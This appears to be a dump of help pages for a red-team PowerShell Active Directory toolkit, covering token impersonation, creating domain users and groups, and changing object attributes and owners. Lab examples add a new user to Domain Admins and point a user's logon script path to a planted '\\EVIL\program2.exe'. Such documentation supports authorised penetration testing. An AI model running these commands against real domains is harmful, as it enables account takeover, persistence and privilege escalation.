    "path": "docs/Recon/Invoke-RevertToSelf.md",
    "content": "# Invoke-RevertToSelf\r\n\r\n## SYNOPSIS\r\nReverts any token impersonation.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect\r\n\r\n## SYNTAX\r\n\r\n```\r\nInvoke-RevertToSelf [[-TokenHandle] <IntPtr>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function uses RevertToSelf() to revert any impersonated tokens.\r\nIf -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),\r\nCloseHandle() is used to close the opened handle.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\n$Token = Invoke-UserImpersonation -Credential $Cred\r\nInvoke-RevertToSelf -TokenHandle $Token\r\n\r\n## PARAMETERS\r\n\r\n### -TokenHandle\r\nAn optional IntPtr TokenHandle returned by Invoke-UserImpersonation.\r\n\r\n```yaml\r\nType: IntPtr\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Invoke-UserImpersonation.md",
    "content": "# Invoke-UserImpersonation\r\n\r\n## SYNOPSIS\r\nCreates a new \"runas /netonly\" type logon and impersonates the token.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect\r\n\r\n## SYNTAX\r\n\r\n### Credential (Default)\r\n```\r\nInvoke-UserImpersonation -Credential <PSCredential> [-Quiet]\r\n```\r\n\r\n### TokenHandle\r\n```\r\nInvoke-UserImpersonation -TokenHandle <IntPtr> [-Quiet]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType\r\nto simulate \"runas /netonly\".\r\nThe resulting token is then impersonated with\r\nImpersonateLoggedOnUser() and the token handle is returned for later usage\r\nwith Invoke-RevertToSelf.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nInvoke-UserImpersonation -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object with alternate credentials\r\nto impersonate in the current thread space.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: Credential\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -TokenHandle\r\nAn IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.\r\nIf this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser()\r\nis executed.\r\n\r\n```yaml\r\nType: IntPtr\r\nParameter Sets: TokenHandle\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Quiet\r\nSuppress any warnings about STA vs MTA.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### IntPtr\r\n\r\nThe TokenHandle result from LogonUser.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/New-DomainGroup.md",
    "content": "# New-DomainGroup\r\n\r\n## SYNOPSIS\r\nCreates a new domain group (assuming appropriate permissions) and returns the group object.\r\n\r\nTODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-PrincipalContext\r\n\r\n## SYNTAX\r\n\r\n```\r\nNew-DomainGroup [-SamAccountName] <String> [[-Name] <String>] [[-DisplayName] <String>]\r\n [[-Description] <String>] [[-Domain] <String>] [[-Credential] <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nFirst binds to the specified domain context using Get-PrincipalContext.\r\nThe bound domain context is then used to create a new\r\nDirectoryServices.AccountManagement.GroupPrincipal with the specified\r\ngroup properties.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nNew-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.'\r\n```\r\n\r\nCreates the 'TestGroup' group with the specified description.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nNew-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred\r\n\r\nCreates the 'TestGroup' group with the specified description using the specified alternate credentials.\r\n\r\n## PARAMETERS\r\n\r\n### -SamAccountName\r\nSpecifies the Security Account Manager (SAM) account name of the group to create.\r\nMaximum of 256 characters.\r\nMandatory.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Name\r\nSpecifies the name of the group to create.\r\nIf not provided, defaults to SamAccountName.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -DisplayName\r\nSpecifies the display name of the group to create.\r\nIf not provided, defaults to SamAccountName.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Description\r\nSpecifies the description of the group to create.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 4\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use to search for user/group principals, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 5\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 6\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### DirectoryServices.AccountManagement.GroupPrincipal\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/New-DomainUser.md",
    "content": "# New-DomainUser\r\n\r\n## SYNOPSIS\r\nCreates a new domain user (assuming appropriate permissions) and returns the user object.\r\n\r\nTODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-PrincipalContext\r\n\r\n## SYNTAX\r\n\r\n```\r\nNew-DomainUser [-SamAccountName] <String> [-AccountPassword] <SecureString> [[-Name] <String>]\r\n [[-DisplayName] <String>] [[-Description] <String>] [[-Domain] <String>] [[-Credential] <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nFirst binds to the specified domain context using Get-PrincipalContext.\r\nThe bound domain context is then used to create a new\r\nDirectoryServices.AccountManagement.UserPrincipal with the specified user properties.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\nNew-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword\r\n\r\nCreates the 'harmj0y2' user with the specified description and password.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\n$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred\r\n\r\nCreates the 'harmj0y2' user with the specified description and password, using the specified\r\nalternate credentials.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\n$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\nNew-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred\r\n\r\nCreates the 'andy' user with the specified description and password, using the specified\r\nalternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember\r\nand the alternate credentials.\r\n\r\n## PARAMETERS\r\n\r\n### -SamAccountName\r\nSpecifies the Security Account Manager (SAM) account name of the user to create.\r\nMaximum of 256 characters.\r\nMandatory.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -AccountPassword\r\nSpecifies the password for the created user.\r\nMandatory.\r\n\r\n```yaml\r\nType: SecureString\r\nParameter Sets: (All)\r\nAliases: Password\r\n\r\nRequired: True\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Name\r\nSpecifies the name of the user to create.\r\nIf not provided, defaults to SamAccountName.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -DisplayName\r\nSpecifies the display name of the user to create.\r\nIf not provided, defaults to SamAccountName.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 4\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Description\r\nSpecifies the description of the user to create.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 5\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use to search for user/group principals, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 6\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 7\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### DirectoryServices.AccountManagement.UserPrincipal\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Remove-RemoteConnection.md",
    "content": "# Remove-RemoteConnection\r\n\r\n## SYNOPSIS\r\nDestroys a connection created by New-RemoteConnection.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect\r\n\r\n## SYNTAX\r\n\r\n### ComputerName (Default)\r\n```\r\nRemove-RemoteConnection [-ComputerName] <String[]>\r\n```\r\n\r\n### Path\r\n```\r\nRemove-RemoteConnection [-Path] <String[]>\r\n```\r\n\r\n## DESCRIPTION\r\nThis function uses WNetCancelConnection2 to destroy a connection created by\r\nNew-RemoteConnection.\r\nIf a -Path isn't specified, a -ComputerName is required to\r\n'unmount' \\\\\\\\$ComputerName\\IPC$.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nRemove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nRemove-RemoteConnection -Path '\\\\PRIMARY.testlab.local\\C$\\'\r\n```\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection\r\n```\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the system to remove a \\\\\\\\ComputerName\\IPC$ connection for.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: ComputerName\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Path\r\nSpecifies the remote \\\\\\\\UNC\\path to remove the connection for.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: Path\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Resolve-IPAddress.md",
    "content": "# Resolve-IPAddress\r\n\r\n## SYNOPSIS\r\nResolves a given hostename to its associated IPv4 address.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nResolve-IPAddress [[-ComputerName] <String[]>]\r\n```\r\n\r\n## DESCRIPTION\r\nResolves a given hostename to its associated IPv4 address using\r\n\\[Net.Dns\\]::GetHostEntry().\r\nIf no hostname is provided, the default\r\nis the IP address of the localhost.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nResolve-IPAddress -ComputerName SERVER\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n@(\"SERVER1\", \"SERVER2\") | Resolve-IPAddress\r\n```\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\n{{Fill ComputerName Description}}\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: $Env:COMPUTERNAME\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### String\r\n\r\nAccepts one or more IP address strings on the pipeline.\r\n\r\n## OUTPUTS\r\n\r\n### System.Management.Automation.PSCustomObject\r\n\r\nA custom PSObject with the ComputerName and IPAddress.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Set-DomainObject.md",
    "content": "# Set-DomainObject\r\n\r\n## SYNOPSIS\r\nModifies a gven property for a specified active directory object.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainObject\r\n\r\n## SYNTAX\r\n\r\n```\r\nSet-DomainObject [[-Identity] <String[]>] [-Set <Hashtable>] [-XOR <Hashtable>] [-Clear <String[]>]\r\n [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nSplats user/object targeting parameters to Get-DomainObject, returning the raw\r\nsearchresult object.\r\nRetrieves the raw directoryentry for the object, and sets\r\nany values from -Set @{}, XORs any values from -XOR @{}, and clears any values\r\nfrom -Clear @().\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nSet-DomainObject testuser -Set @{'mstsinitialprogram'='\\\\EVIL\\program.exe'} -Verbose\r\n```\r\n\r\nVERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))\r\nVERBOSE: Setting mstsinitialprogram to \\\\\\\\EVIL\\program.exe for object testuser\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n\"S-1-5-21-890171859-3433809279-3366196753-1108\",\"testuser\" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\\\EVIL\\program2.exe'} -Verbose\r\n```\r\n\r\nVERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: Get-DomainObject filter string:\r\n(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108)))\r\nVERBOSE: Setting mstsinitialprogram to \\\\\\\\EVIL\\program2.exe for object harmj0y\r\nVERBOSE: Setting countrycode to 1234 for object harmj0y\r\nVERBOSE: Get-DomainSearcher search string:\r\nLDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))\r\nVERBOSE: Setting mstsinitialprogram to \\\\\\\\EVIL\\program2.exe for object testuser\r\nVERBOSE: Setting countrycode to 1234 for object testuser\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n\"S-1-5-21-890171859-3433809279-3366196753-1108\",\"testuser\" | Set-DomainObject -Clear department -Verbose\r\n```\r\n\r\nCleares the 'department' field for both object identities.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nGet-DomainUser testuser | ConvertFrom-UACValue -Verbose\r\n```\r\n\r\nName                           Value\r\n----                           -----\r\nNORMAL_ACCOUNT                 512\r\n\r\n\r\nSet-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose\r\n\r\nVERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))\r\nVERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser'\r\n\r\nGet-DomainUser testuser | ConvertFrom-UACValue -Verbose\r\n\r\nName                           Value\r\n----                           -----\r\nNORMAL_ACCOUNT                 512\r\nDONT_EXPIRE_PASSWORD           65536\r\n\r\n### -------------------------- EXAMPLE 5 --------------------------\r\n```\r\nGet-DomainUser -Identity testuser -Properties scriptpath\r\n```\r\n\r\nscriptpath\r\n----------\r\n\\\\\\\\primary\\sysvol\\blah.ps1\r\n\r\n$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nSet-DomainObject -Identity testuser -Set @{'scriptpath'='\\\\\\\\EVIL\\program2.exe'} -Credential $Cred -Verbose\r\nVERBOSE: \\[Get-Domain\\] Using alternate credentials for Get-Domain\r\nVERBOSE: \\[Get-Domain\\] Extracted domain 'TESTLAB' from -Credential\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainSearcher\\] Using alternate credentials for LDAP connection\r\nVERBOSE: \\[Get-DomainObject\\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))\r\nVERBOSE: \\[Set-DomainObject\\] Setting 'scriptpath' to '\\\\\\\\EVIL\\program2.exe' for object 'testuser'\r\n\r\nGet-DomainUser -Identity testuser -Properties scriptpath\r\n\r\nscriptpath\r\n----------\r\n\\\\\\\\EVIL\\program2.exe\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA SamAccountName (e.g.\r\nharmj0y), DistinguishedName (e.g.\r\nCN=harmj0y,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DistinguishedName, SamAccountName, Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Set\r\nSpecifies values for one or more object properties (in the form of a hashtable) that will replace the current values.\r\n\r\n```yaml\r\nType: Hashtable\r\nParameter Sets: (All)\r\nAliases: Reaplce\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -XOR\r\nSpecifies values for one or more object properties (in the form of a hashtable) that will XOR the current values.\r\n\r\n```yaml\r\nType: Hashtable\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Clear\r\nSpecifies an array of object properties that will be cleared in the directory.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Set-DomainObjectOwner.md",
    "content": "# Set-DomainObjectOwner\r\n\r\n## SYNOPSIS\r\nModifies the owner for a specified active directory object.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainObject\r\n\r\n## SYNTAX\r\n\r\n```\r\nSet-DomainObjectOwner [-Identity] <String> -OwnerIdentity <String> [-Domain <String>] [-LDAPFilter <String>]\r\n [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nRetrieves the Active Directory object specified by -Identity by splatting to\r\nGet-DomainObject, returning the raw searchresult object.\r\nRetrieves the raw\r\ndirectoryentry for the object, and sets the object owner to -OwnerIdentity.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nSet-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y\r\n```\r\n\r\nSet the owner of 'dfm' in the current domain to 'harmj0y'.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nSet-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred\r\n\r\nSet the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials.\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA SamAccountName (e.g.\r\nharmj0y), DistinguishedName (e.g.\r\nCN=harmj0y,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\r\nof the AD object to set the owner for.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DistinguishedName, SamAccountName, Name\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -OwnerIdentity\r\nA SamAccountName (e.g.\r\nharmj0y), DistinguishedName (e.g.\r\nCN=harmj0y,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\r\nof the owner to set for -Identity.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Owner\r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: 